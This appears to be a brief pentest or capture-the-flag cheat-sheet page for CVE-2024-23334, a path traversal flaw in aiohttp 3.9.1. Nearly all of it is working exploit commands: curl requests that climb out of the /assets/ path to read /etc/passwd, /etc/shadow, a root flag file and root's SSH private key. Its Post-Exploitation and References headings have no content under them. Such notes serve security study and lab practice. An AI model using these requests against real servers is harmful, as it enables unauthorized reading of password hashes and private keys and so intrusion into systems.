aiohttp
CVE-2024-23334 - Path Traversal / LFI
HTTP/1.1 200 OK
Server: Python/3.9 aiohttp/3.9.1Exploitation
# Read /etc/passwd
curl "http://target:8080/assets/../../../etc/passwd"
# Read /etc/shadow (if running as root)
curl "http://target:8080/assets/../../../etc/shadow"
# Read root flag
curl "http://target:8080/assets/../../../root/root.txt"
# Read SSH keys
curl "http://target:8080/assets/../../../root/.ssh/id_rsa"Common Static Paths to Target
Post-Exploitation
References
Last updated